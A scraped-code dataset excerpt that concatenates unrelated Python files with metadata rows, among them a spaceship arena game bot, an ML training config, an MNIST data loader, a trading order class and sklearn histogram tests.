tmp = self.accelerateTo(s_ship, 2*s_ship.posx - rock.posx, 2*s_ship.posy - rock.posy, math.sqrt((rock_repel_r-dist)/rock_repel_r))
avoid[0] += tmp[0]
avoid[1] += tmp[1]
avoid[2] += tmp[2]
toc = self.toC(rock, s_ship, .1)
if not toc == None:
if toc[0] > 0:
gamestate.log("Rock of uid " + str(rock_uid) + ": Will collide in " + ('%.2f' % toc[0]) + " seconds")
shp = self.estimateShip(s_ship, toc[0])
rck = self.estimateRock(rock, toc[0])
if toc[0] <= rock_repel_t:
tmp = self.accelerateTo(shp, 2*shp.posx - rck.posx, 2*shp.posy - rck.posy, math.sqrt((rock_repel_t-toc[0])/rock_repel_t))
final[0] += tmp[0]
final[1] += tmp[1]
final[2] += tmp[2]
if rock_less > toc[0]:
rock_less = toc[0]
rock_less_uid = rock_uid
out[0] += final[0]
out[1] += final[1]
out[2] += final[2]
#Avoid lasers
laser_repel_r = 15
laser_repel_t = 3
laser_less = 9999
laser_less_uid = None
for laser_uid in gamestate.lasers:
laser = gamestate.lasers[laser_uid]
dist = self.dist(s_ship, laser)
final = [0, 0, 0]
if dist <= laser_repel_r:
tmp = self.accelerateTo(s_ship, 2*s_ship.posx - laser.posx, 2*s_ship.posy - laser.posy, math.sqrt((laser_repel_r-dist)/laser_repel_r))
avoid[0] += tmp[0]
avoid[1] += tmp[1]
avoid[2] += tmp[2]
toc = self.toC(laser, s_ship, .1)
if not toc == None:
if toc[0] > 0:
if toc[0] <= laser.lifetime:
gamestate.log("Shot of uid " + str(laser_uid) + " from " + str(laser.owner) + ": Will hit in " + ('%.2f' % toc[0]) + " seconds")
shp = self.estimateShip(s_ship, toc[0])
lsr = self.estimateLaser(laser, toc[0])
shipp = self.estimateShip(s_ship, self.step)
las = self.estimateLaser(laser, self.step)
prediction = self.predShoot(shipp, las, 75, gamestate)
if prediction is not None:
time, coords = prediction
time += self.step
gamestate.log(str())
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 3
prediction = self.predShoot(shipp, las, 50, gamestate)
if prediction is not None:
time, coords = prediction
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 2
prediction = self.predShoot(shipp, las, 25, gamestate)
if prediction is not None:
time, coords = prediction
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 1
if toc[0] <= laser_repel_t:
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-toc[0])/laser_repel_t))
final[0] += tmp[0]
final[1] += tmp[1]
final[2] += tmp[2]
if laser_less > toc[0]:
laser_less = toc[0]
laser_less_uid = laser_uid
else:
gamestate.log("Shot of uid " + str(laser_uid) + " from " + str(laser.owner) + ": Will not hit. Just " + ('%.2f' % laser.lifetime) + " seconds remaining.")
out[0] += final[0]
out[1] += final[1]
out[2] += final[2]
#Try not to collide with the arena
arenac = 1
if math.sqrt(s_ship.posx**2 + s_ship.posy**2) > gamestate.arenaRadius - 5:
tmp = self.accelerateTo(s_ship, 0, 0, (math.sqrt(s_ship.posx**2 + s_ship.posy**2) - (gamestate.arenaRadius - 5))/5)
out[0] += tmp[0]*arenac
out[1] += tmp[1]*arenac
out[2] += tmp[2]*arenac
#Stay at a distance from target
attrcnt = .3
if self.target is not None:
target_r = 30
dist = self.dist(s_ship, gamestate.ships[self.target])
linpot = 0
if target_r-dist is not zero:
linpot = target_r/(dist - target_r)
tmp = self.accelerateTo(s_ship, gamestate.ships[self.target].posx, gamestate.ships[self.target].posy, (linpot**8)*self.sign(linpot))
tmp = self.normalize(tmp)
mx = max(abs(tmp[0]), abs(tmp[1]), abs(tmp[2]))
if mx != 0:
mx = 1/mx
avoid[0] += tmp[0]*mx*attrcnt
avoid[1] += tmp[1]*mx*attrcnt
avoid[2] += tmp[2]*mx*attrcnt
#Keep track of ship headings/ships targeting self
predeyesight = .5
for ship_uid in gamestate.ships:
if ship_uid is self.uid:
continue
ship = gamestate.ships[ship_uid]
targetp = self.estimateShip(s_ship, self.step)
shipp = self.estimateShip(ship, self.step)
prediction = None
shoot_type = 0
if shipp.charge < 2 and shipp.charge >= 1:
prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
prediction1 = None
prediction2 = None
elif shipp.charge < 3:
prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
prediction1 = self.predShoot(shipp, targetp, 50, gamestate)
prediction2 = None
else:
prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
prediction1 = self.predShoot(shipp, targetp, 50, gamestate)
prediction2 = self.predShoot(shipp, targetp, 75, gamestate)
if prediction2 is not None:
time, coords = prediction2
time += self.step
laser = Laser(0)
laser.lifetime = 3
laser.owner = ship_uid
laser.posx = shipp.posx
laser.posy = shipp.posy
laser.velx = shipp.velx + 75*math.sin(self.toRad(shipp.ang))
laser.vely = shipp.posy + 75*math.cos(self.toRad(shipp.ang))
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
if time < 1:
shp = self.estimateShip(s_ship, time)
lsr = self.estimateLaser(laser, time)
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
avoid[0] += tmp[0]*predeyesight
avoid[1] += tmp[1]*predeyesight
avoid[2] += tmp[2]*predeyesight
gamestate.log("Ship " + str(ship_uid) + " is targeting at 75m/s...")
elif prediction1 is not None:
time, coords = prediction1
time += self.step
laser = Laser(0)
laser.lifetime = 3
laser.owner = ship_uid
laser.posx = shipp.posx
laser.posy = shipp.posy
laser.velx = shipp.velx + 50*math.sin(self.toRad(shipp.ang))
laser.vely = shipp.posy + 50*math.cos(self.toRad(shipp.ang))
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
if time < 1:
shp = self.estimateShip(s_ship, time)
lsr = self.estimateLaser(laser, time)
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
avoid[0] += tmp[0]*predeyesight
avoid[1] += tmp[1]*predeyesight
avoid[2] += tmp[2]*predeyesight
gamestate.log("Ship " + str(ship_uid) + " is targeting at 50m/s...")
if prediction0 is not None:
time, coords = prediction0
time += self.step
laser = Laser(0)
laser.lifetime = 3
laser.owner = ship_uid
laser.posx = shipp.posx
laser.posy = shipp.posy
laser.velx = shipp.velx + 25*math.sin(self.toRad(shipp.ang))
laser.vely = shipp.posy + 25*math.cos(self.toRad(shipp.ang))
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
if time < 1:
shp = self.estimateShip(s_ship, time)
lsr = self.estimateLaser(laser, time)
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
avoid[0] += tmp[0]*predeyesight
avoid[1] += tmp[1]*predeyesight
avoid[2] += tmp[2]*predeyesight
gamestate.log("Ship " + str(ship_uid) + " is targeting at 25m/s...")
#apply rotations and final weight calculation
peravd = 2
out[0] += avoid[0]*peravd
out[1] += avoid[1]*peravd
out[2] += avoid[2]*peravd
mx = 1
#out = self.normalize(out)
#mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
#if mx != 0:
# mx = 1/mx
#mx = 1
rotmulti = 1
#out[0] = 0
out[1] += rotation_out*rotmulti
out[2] += -rotation_out*rotmulti
#out_s = 0
#out = [0, 0, 0]
#virtual 'friction'
'''kF = .5
vel = [s_ship.posx-s_ship.velx, s_ship.posy-s_ship.vely]
mvel = math.sqrt(s_ship.velx**2 + s_ship.vely**2)
vel = self.normalize(vel)
tmp = self.accelerateTo(s_ship, vel[0], vel[1], kF)
out[0] += tmp[0]*(mvel/30)
out[1] += tmp[1]*(mvel/30)
out[2] += tmp[2]*(mvel/30)'''
#Emergency overwrite - in case of iminent danger
rotation_out = 0
if rock_less <= 1:
out_s = 1
gamestate.log("Overwriting controls: rock 1s of ID " + str(laser_less_uid))
shipp = self.estimateShip(s_ship, self.step)
targetp = self.estimateRock(gamestate.rocks[rock_less_uid], self.step)
prediction = self.predShoot(shipp, targetp, 25, gamestate)
if prediction is not None:
time, coords = prediction
rotation_out = self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
if rock_less <= .5:
gamestate.log("Overwriting controls: rock .5 of ID " + str(rock_less_uid))
shp = self.estimateShip(s_ship, rock_less)
rck = self.estimateRock(gamestate.rocks[rock_less_uid], rock_less)
out = self.accelerateTo(shp, 2*shp.posx - rck.posx, 2*shp.posy - rck.posy)
out = self.normalize(out)
out = self.invert(out)
out[1] += rotation_out*rotmulti
out[2] += -rotation_out*rotmulti
mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
if mx != 0:
mx = 1/mx
if laser_less <= 1.5:
out_s = 1
gamestate.log("Overwriting controls: laser 1s of ID " + str(laser_less_uid))
shipp = self.estimateShip(s_ship, self.step)
targetp = self.estimateLaser(gamestate.lasers[laser_less_uid], self.step)
prediction = self.predShoot(shipp, targetp, 25, gamestate)
if prediction is not None:
time, coords = prediction
rotation_out = self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
if laser_less <= .5:
gamestate.log("Overwriting controls: laser .5 of ID " + str(laser_less_uid))
shp = self.estimateShip(s_ship, laser_less)
lsr = self.estimateLaser(gamestate.lasers[laser_less_uid], laser_less)
out = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy)
out = self.normalize(out)
out = self.invert(out)
#@out[0] = -out[0]
out[1] += rotation_out*rotmulti
out[2] += -rotation_out*rotmulti
mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
if mx != 0:
mx = 1/mx
return Action(-out[0]*mx, out[1]*mx, out[2]*mx, out_s)
gamestate.log(str(s_ship.vely))
return Action(1, 0, 0, 0)
GameState(SeijiBot()).connect()
| 37.884615
| 608
| 0.496853
| 24,550
| 0.996954
| 0
| 0
| 0
| 0
| 0
| 0
| 2,049
| 0.083208
|
c41f3f30efc1128fe0e35981a452b93b464ce15f
| 304
|
py
|
Python
|
configs/gdrn/ycbvPbrSO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO_09_10PottedMeatCan.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | 33
|
2021-12-15T07:11:47.000Z
|
2022-03-29T08:58:32.000Z
|
configs/gdrn/ycbvPbrSO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO_09_10PottedMeatCan.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | 3
|
2021-12-15T11:39:54.000Z
|
2022-03-29T07:24:23.000Z
|
configs/gdrn/ycbvPbrSO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO_09_10PottedMeatCan.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | null | null | null |
_base_ = "./resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO_01_02MasterChefCan.py"
OUTPUT_DIR = (
"output/gdrn/ycbvPbrSO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO/09_10PottedMeatCan"
)
DATASETS = dict(TRAIN=("ycbv_010_potted_meat_can_train_pbr",))
| 50.666667
| 117
| 0.871711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 245
| 0.805921
|
c41fd9dec58d9f797e213eba1e8064f8aba14576
| 682
|
py
|
Python
|
days/01-03-datetimes/code/100day_calc.py
|
rhelmstedter/100daysofcode-with-python-course
|
076c99939b5641be541023f61c10ff30a7f05524
|
[
"MIT"
] | null | null | null |
days/01-03-datetimes/code/100day_calc.py
|
rhelmstedter/100daysofcode-with-python-course
|
076c99939b5641be541023f61c10ff30a7f05524
|
[
"MIT"
] | null | null | null |
days/01-03-datetimes/code/100day_calc.py
|
rhelmstedter/100daysofcode-with-python-course
|
076c99939b5641be541023f61c10ff30a7f05524
|
[
"MIT"
] | null | null | null |
from datetime import date, datetime, timedelta
import time
START_DATE = date(2021, 5, 25)
duration = timedelta(days=100)
def countdown():
event_delta = LAST_DAY_OF_SCHOOL - datetime.now()
print()
print("\tTime until school is out for summer 2021:", end="\n\n")
while event_delta.seconds > 0:
hours, remaining_delta = divmod(event_delta.seconds, 3600)
mins, secs = divmod(remaining_delta, 60)
timer = f"\t{event_delta.days:02d} days {hours:02d} hours {mins:02d} minutes {secs:02d} seconds"
print(timer, end="\r")
time.sleep(1)
event_delta = LAST_DAY_OF_SCHOOL - datetime.now()
print("School's out for summer!")
| 32.47619
| 104
| 0.668622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 169
| 0.247801
|
c42001c4593f0af28c9a44cdd561459d12ab258c
| 195
|
py
|
Python
|
output/copilot/python/timeout/palindrome-partitioning.py
|
nhtnhan/CMPUT663-copilot-eval
|
896711d006eb37a78e010cd1b9f79dc285ad054d
|
[
"Apache-2.0"
] | null | null | null |
output/copilot/python/timeout/palindrome-partitioning.py
|
nhtnhan/CMPUT663-copilot-eval
|
896711d006eb37a78e010cd1b9f79dc285ad054d
|
[
"Apache-2.0"
] | null | null | null |
output/copilot/python/timeout/palindrome-partitioning.py
|
nhtnhan/CMPUT663-copilot-eval
|
896711d006eb37a78e010cd1b9f79dc285ad054d
|
[
"Apache-2.0"
] | null | null | null |
# https://leetcode.com/problems/palindrome-partitioning/
class Solution(object):
def partition(self, s):
"""
:type s: str
:rtype: List[List[str]]
"""
| 21.666667
| 56
| 0.54359
| 128
| 0.65641
| 0
| 0
| 0
| 0
| 0
| 0
| 124
| 0.635897
|
c42012e1044d2e28166a8361142bd8a07f4789f3
| 6,071
|
py
|
Python
|
aggregathor/ea_datasource.py
|
big-data-lab-umbc/autodist
|
c8514b27cf5608f35254b63c4ac8093c7295a8e7
|
[
"Apache-2.0"
] | null | null | null |
aggregathor/ea_datasource.py
|
big-data-lab-umbc/autodist
|
c8514b27cf5608f35254b63c4ac8093c7295a8e7
|
[
"Apache-2.0"
] | null | null | null |
aggregathor/ea_datasource.py
|
big-data-lab-umbc/autodist
|
c8514b27cf5608f35254b63c4ac8093c7295a8e7
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import keras
import random
from keras.datasets import mnist
from keras import backend as K
K.set_floatx('float64')
class DataSource(object):
def __init__(self):
raise NotImplementedError()
def partitioned_by_rows(self, num_workers, test_reserve=.3):
raise NotImplementedError()
def sample_single_non_iid(self, weight=None):
raise NotImplementedError()
class Mnist(DataSource):
IID = True
MAX_NUM_CLASSES_PER_CLIENT = 10
TRAIN_VALID_DATA_RANGE = np.array([800,800])
CLASSES = range(10)
# def __init__(self, train_range = (0.7 * TRAIN_VALID_DATA_RANGE).astype(int),
# valid_range = (0.3 * TRAIN_VALID_DATA_RANGE).astype(int),
# test_range = [80,120]):
# train:valid:test = 800:400:100
def __init__(self, train_range = (TRAIN_VALID_DATA_RANGE).astype(int),
valid_range = (0.5 * TRAIN_VALID_DATA_RANGE).astype(int),
test_range = [100,100]):
train_size = random.randint(train_range[0], train_range[1])
test_size = random.randint(test_range[0], test_range[1])
valid_size = random.randint(valid_range[0], valid_range[1])
#(x_train, y_train), (x_test, y_test) = mnist.load_data()
mnistdata = np.load('./mnist.npz')
x_train = mnistdata['x_train'].astype('float64')
y_train = mnistdata['y_train'].astype('float64')
x_test = mnistdata['x_test'].astype('float64')
y_test = mnistdata['y_test'].astype('float64')
total_train_size, total_test_size = x_train.shape[0], x_test.shape[0]
total_valid_size = int(total_train_size * .3)
total_train_size = int(total_train_size * .7)
if Mnist.IID:
train_sample_idx = np.random.choice(total_train_size, train_size,replace=True)
valid_sample_idx = np.random.choice(range(total_train_size, total_train_size + total_valid_size), valid_size, replace=True)
test_sample_idx = np.random.choice(total_test_size, test_size, replace=True)
else:
label_w = self.gen_dummy_non_iid_weights()
# print('label_w', label_w)
train_weights = self.gen_sample_weights(y_train, label_w)
valid_weights = train_weights[total_train_size:] / np.sum(train_weights[total_train_size:])
train_weights = train_weights[0:total_train_size] / np.sum(train_weights[0:total_train_size])
test_weights = self.gen_sample_weights(y_test, label_w)
train_sample_idx = np.random.choice(total_train_size, train_size,
replace=True, p=train_weights)
valid_sample_idx = np.random.choice(range(total_train_size, total_train_size + total_valid_size), valid_size,
replace=True, p=valid_weights)
test_sample_idx = np.random.choice(total_test_size, test_size,
replace=True, p=test_weights)
self.x_train, self.y_train = Mnist.post_process(
x_train[train_sample_idx], y_train[train_sample_idx])
self.x_valid, self.y_valid= Mnist.post_process(
x_train[valid_sample_idx], y_train[valid_sample_idx])
self.x_test, self.y_test = Mnist.post_process(
x_test[test_sample_idx], y_test[test_sample_idx])
print('train', self.x_train.shape, self.y_train.shape,
'valid', self.x_valid.shape, 'test', self.x_test.shape)
def gen_sample_weights(self,labels, label_w):
size_per_class = np.array([np.sum(labels == i) for i in Mnist.CLASSES])
label_w = np.divide(label_w, size_per_class)
sample_w = np.zeros(labels.shape[0])
sample_w[labels] = label_w
sample_w /= np.sum(sample_w)
return sample_w
def gen_dummy_non_iid_weights(self):
num_classes_this_client = random.randint(1, Mnist.MAX_NUM_CLASSES_PER_CLIENT + 1)
classes_this_client = np.random.choice(Mnist.CLASSES, num_classes_this_client)
w = np.random.rand(num_classes_this_client)
weights = np.zeros(len(Mnist.CLASSES))
weights[classes_this_client] = w
return weights
# assuming client server already agreed on data format
def post_process(x, y):
if K.image_data_format() == 'channels_first':
sample_shape = (1, ) + x.shape[1:]
else:
sample_shape = x.shape[1:] + (1, )
x = x.reshape((x.shape[0],) + sample_shape)
y_vec = keras.utils.to_categorical(y, len(Mnist.CLASSES))
return x / 255., y_vec
# split evenly into exact num_workers chunks, with test_reserve globally
def partitioned_by_rows(self, num_workers, test_reserve=.3):
n_test = int(self.x.shape[0] * test_reserve)
n_train = self.x.shape[0] - n_test
nums = [n_train // num_workers] * num_workers
nums[-1] += n_train % num_workers
idxs = np.array([np.random.choice(np.arange(n_train), num, replace=False) for num in nums])
return {
# (size_partition * 28 * 28, size_partition * 1) * num_partitions
"train": [post_process(self.x[idx], self.y[idx]) for idx in idxs],
# (n_test * 28 * 28, n_test * 1)
"test": post_process(self.x[np.arange(n_train, n_train + n_test)], self.y[np.arange(n_train, n_train + n_test)])
}
# generate t, t, v dataset given distribution and split
def fake_non_iid_data(self, min_train=100, max_train=1000, data_split=(.6,.3,.1)):
return ((self.x_train, self.y_train),
(self.x_test, self.y_test),
(self.x_valid, self.y_valid))
if __name__ == "__main__":
# m = Mnist()
# # res = m.partitioned_by_rows(9)
# # print(res["test"][1].shape)
# for _ in range(10):
# print(m.gen_dummy_non_iid_weights())
fake_data = Mnist().fake_non_iid_data(min_train=10,max_train=10,data_split=(0.6, 0.3, 0.1))
train_data, test_data, valid_data = fake_data
x_train, y_train = train_data
x_test, y_test = test_data
x_valid, y_valid = valid_data
print(y_valid)
| 43.056738
| 135
| 0.653434
| 5,472
| 0.901334
| 0
| 0
| 0
| 0
| 0
| 0
| 864
| 0.142316
|
c42094cad42afee256fee1fad8338f794ac45419
| 255
|
py
|
Python
|
proxySTAR_V3/certbot/venv/lib/python2.7/site-packages/pylint/test/functional/pygtk_enum_crash.py
|
mami-project/lurk
|
98c293251e9b1e9c9a4b02789486c5ddaf46ba3c
|
[
"Apache-2.0"
] | 2
|
2017-07-05T09:57:33.000Z
|
2017-11-14T23:05:53.000Z
|
Libraries/Python/pylint/v1.4.4/pylint/test/functional/pygtk_enum_crash.py
|
davidbrownell/Common_Environment
|
4015872aeac8d5da30a6aa7940e1035a6aa6a75d
|
[
"BSL-1.0"
] | 1
|
2019-01-17T14:26:22.000Z
|
2019-01-17T22:56:26.000Z
|
Libraries/Python/pylint/v1.4.4/pylint/test/functional/pygtk_enum_crash.py
|
davidbrownell/Common_Environment
|
4015872aeac8d5da30a6aa7940e1035a6aa6a75d
|
[
"BSL-1.0"
] | 1
|
2017-08-31T14:33:03.000Z
|
2017-08-31T14:33:03.000Z
|
# pylint: disable=C0121
"""http://www.logilab.org/ticket/124337"""
import gtk
def print_some_constant(arg=gtk.BUTTONS_OK):
"""crash because gtk.BUTTONS_OK, a gtk enum type, is returned by
astroid as a constant
"""
print(arg)
| 21.25
| 69
| 0.662745
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 166
| 0.65098
|
c4231b8d3eab02f60fcc36025477bf600813aa38
| 1,519
|
py
|
Python
|
py_at/OrderItem.py
|
kanghua309/at_py
|
8fa7943a9de52cd81d235f06b57a25aa07fb715b
|
[
"Apache-2.0"
] | null | null | null |
py_at/OrderItem.py
|
kanghua309/at_py
|
8fa7943a9de52cd81d235f06b57a25aa07fb715b
|
[
"Apache-2.0"
] | null | null | null |
py_at/OrderItem.py
|
kanghua309/at_py
|
8fa7943a9de52cd81d235f06b57a25aa07fb715b
|
[
"Apache-2.0"
] | 2
|
2018-09-19T16:07:26.000Z
|
2019-11-09T15:46:21.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__title__ = ''
__author__ = 'HaiFeng'
__mtime__ = '2016/8/16'
"""
import time
from py_at.EnumDefine import *
########################################################################
class OrderItem(object):
"""策略信号"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.Instrument = ''
self.DateTime = time.strftime('%Y%m%d %H:%Mm:%S', time.localtime(time.time()))
self.Direction = Direction.Buy
self.Offset = Offset.Open
self.Price = 0.0
self.Volume = 0
self.Remark = ''
self.RelationOpenOrders = []
#策略相关
self.AvgEntryPriceShort = 0.0
self.AvgEntryPriceLong = 0.0
self.PositionLong = 0
self.PositionShort = 0
self.EntryDateLong = ''
self.EntryPriceLong = 0.0
self.ExitDateShort = ''
self.ExitPriceShort = 0.0
self.EntryDateShort = ''
self.EntryPriceShort = 0.0
self.ExitDateLong = ''
self.ExitPriceLong = 0.0
self.LastEntryDateShort = ''
self.LastEntryPriceShort = 0.0
self.LastEntryDateLong = ''
self.LastEntryPriceLong = 0.0
self.IndexEntryLong = -1
self.IndexEntryShort = -1
self.IndexLastEntryLong = -1
self.IndexLastEntryShort = -1
self.IndexExitLong = -1
self.IndexExitShort = -1
#----------------------------------------------------------------------
def __str__(self):
""""""
return '{self.Instrument}, {self.DateTime}, {self.Direction}, {self.Offset}, {self.Price}, {self.Volume}, {self.Remark}'.format(self = self)
| 26.649123
| 142
| 0.578012
| 1,301
| 0.847557
| 0
| 0
| 0
| 0
| 0
| 0
| 528
| 0.343974
|
c4246529ebfd4899aa1216798277f3b74d90b3f5
| 547
|
py
|
Python
|
pyscf/nao/m_rf_den.py
|
mfkasim1/pyscf
|
7be5e015b2b40181755c71d888449db936604660
|
[
"Apache-2.0"
] | 3
|
2021-02-28T00:52:53.000Z
|
2021-03-01T06:23:33.000Z
|
pyscf/nao/m_rf_den.py
|
mfkasim1/pyscf
|
7be5e015b2b40181755c71d888449db936604660
|
[
"Apache-2.0"
] | 36
|
2018-08-22T19:44:03.000Z
|
2020-05-09T10:02:36.000Z
|
pyscf/nao/m_rf_den.py
|
mfkasim1/pyscf
|
7be5e015b2b40181755c71d888449db936604660
|
[
"Apache-2.0"
] | 4
|
2018-02-14T16:28:28.000Z
|
2019-08-12T16:40:30.000Z
|
from __future__ import print_function, division
import numpy as np
from numpy import identity, dot, zeros, zeros_like
def rf_den_via_rf0(self, rf0, v):
""" Whole matrix of the interacting response via non-interacting response and interaction"""
rf = zeros_like(rf0)
I = identity(rf0.shape[1])
for ir,r in enumerate(rf0):
rf[ir] = dot(np.linalg.inv(I-dot(r,v)), r)
return rf
def rf_den(self, ww):
""" Full matrix interacting response from NAO GW class"""
rf0 = self.rf0(ww)
return rf_den_via_rf0(self, rf0, self.kernel_sq)
| 28.789474
| 94
| 0.718464
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 149
| 0.272395
|
c4253c3edd906a40552637d516df1601047e0dd5
| 669
|
py
|
Python
|
app/model/compare_users.py
|
dwdraugr/YADS
|
c8036d8196a3158636aaa4f1910033e70ec8ecb4
|
[
"Apache-2.0"
] | 3
|
2019-09-02T11:26:58.000Z
|
2019-12-06T15:54:38.000Z
|
app/model/compare_users.py
|
dwdraugr/YADS
|
c8036d8196a3158636aaa4f1910033e70ec8ecb4
|
[
"Apache-2.0"
] | null | null | null |
app/model/compare_users.py
|
dwdraugr/YADS
|
c8036d8196a3158636aaa4f1910033e70ec8ecb4
|
[
"Apache-2.0"
] | null | null | null |
from app.model.model import Model
class CompareUsers(Model):
def get_compare_users(self, uid):
cursor = self.matchadb.cursor()
cursor.execute('SELECT whomid FROM likes WHERE whoid = %s', (uid,))
whomids = [item[0] for item in cursor.fetchall()]
if len(whomids) == 0:
raise ValueError('Likes not found')
result = list()
for whomid in whomids:
cursor.execute('SELECT whomid FROM likes WHERE whoid = %s AND '
'whomid = %s', (uid, whomid))
r = cursor.fetchone()
if cursor.rowcount > 0:
result.append(r[0])
return result
| 35.210526
| 75
| 0.560538
| 632
| 0.944694
| 0
| 0
| 0
| 0
| 0
| 0
| 121
| 0.180867
|
c425a0389a78978ea2d9dbb437a26224ad54fcc9
| 9,004
|
py
|
Python
|
venv/Lib/site-packages/sklearn/ensemble/_hist_gradient_boosting/tests/test_histogram.py
|
mokshagna517/recommendation_sys
|
bc8ced225dff3c93d619ff5da363f42d0aa0676c
|
[
"MIT"
] | 25
|
2019-03-08T01:03:03.000Z
|
2022-02-14T17:38:32.000Z
|
venv/Lib/site-packages/sklearn/ensemble/_hist_gradient_boosting/tests/test_histogram.py
|
mokshagna517/recommendation_sys
|
bc8ced225dff3c93d619ff5da363f42d0aa0676c
|
[
"MIT"
] | 9
|
2020-09-25T22:32:02.000Z
|
2022-02-09T23:45:10.000Z
|
venv/Lib/site-packages/sklearn/ensemble/_hist_gradient_boosting/tests/test_histogram.py
|
mokshagna517/recommendation_sys
|
bc8ced225dff3c93d619ff5da363f42d0aa0676c
|
[
"MIT"
] | 31
|
2019-01-15T20:16:50.000Z
|
2022-03-01T05:47:38.000Z
|
import numpy as np
import pytest
from numpy.testing import assert_allclose
from numpy.testing import assert_array_equal
from sklearn.ensemble._hist_gradient_boosting.histogram import (
_build_histogram_naive,
_build_histogram,
_build_histogram_no_hessian,
_build_histogram_root_no_hessian,
_build_histogram_root,
_subtract_histograms
)
from sklearn.ensemble._hist_gradient_boosting.types import HISTOGRAM_DTYPE
from sklearn.ensemble._hist_gradient_boosting.types import G_H_DTYPE
from sklearn.ensemble._hist_gradient_boosting.types import X_BINNED_DTYPE
@pytest.mark.parametrize(
'build_func', [_build_histogram_naive, _build_histogram])
def test_build_histogram(build_func):
binned_feature = np.array([0, 2, 0, 1, 2, 0, 2, 1], dtype=X_BINNED_DTYPE)
# Small sample_indices (below unrolling threshold)
ordered_gradients = np.array([0, 1, 3], dtype=G_H_DTYPE)
ordered_hessians = np.array([1, 1, 2], dtype=G_H_DTYPE)
sample_indices = np.array([0, 2, 3], dtype=np.uint32)
hist = np.zeros((1, 3), dtype=HISTOGRAM_DTYPE)
build_func(0, sample_indices, binned_feature, ordered_gradients,
ordered_hessians, hist)
hist = hist[0]
assert_array_equal(hist['count'], [2, 1, 0])
assert_allclose(hist['sum_gradients'], [1, 3, 0])
assert_allclose(hist['sum_hessians'], [2, 2, 0])
# Larger sample_indices (above unrolling threshold)
sample_indices = np.array([0, 2, 3, 6, 7], dtype=np.uint32)
ordered_gradients = np.array([0, 1, 3, 0, 1], dtype=G_H_DTYPE)
ordered_hessians = np.array([1, 1, 2, 1, 0], dtype=G_H_DTYPE)
hist = np.zeros((1, 3), dtype=HISTOGRAM_DTYPE)
build_func(0, sample_indices, binned_feature, ordered_gradients,
ordered_hessians, hist)
hist = hist[0]
assert_array_equal(hist['count'], [2, 2, 1])
assert_allclose(hist['sum_gradients'], [1, 4, 0])
assert_allclose(hist['sum_hessians'], [2, 2, 1])
def test_histogram_sample_order_independence():
# Make sure the order of the samples has no impact on the histogram
# computations
rng = np.random.RandomState(42)
n_sub_samples = 100
n_samples = 1000
n_bins = 256
binned_feature = rng.randint(0, n_bins - 1, size=n_samples,
dtype=X_BINNED_DTYPE)
sample_indices = rng.choice(np.arange(n_samples, dtype=np.uint32),
n_sub_samples, replace=False)
ordered_gradients = rng.randn(n_sub_samples).astype(G_H_DTYPE)
hist_gc = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_build_histogram_no_hessian(0, sample_indices, binned_feature,
ordered_gradients, hist_gc)
ordered_hessians = rng.exponential(size=n_sub_samples).astype(G_H_DTYPE)
hist_ghc = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_build_histogram(0, sample_indices, binned_feature,
ordered_gradients, ordered_hessians, hist_ghc)
permutation = rng.permutation(n_sub_samples)
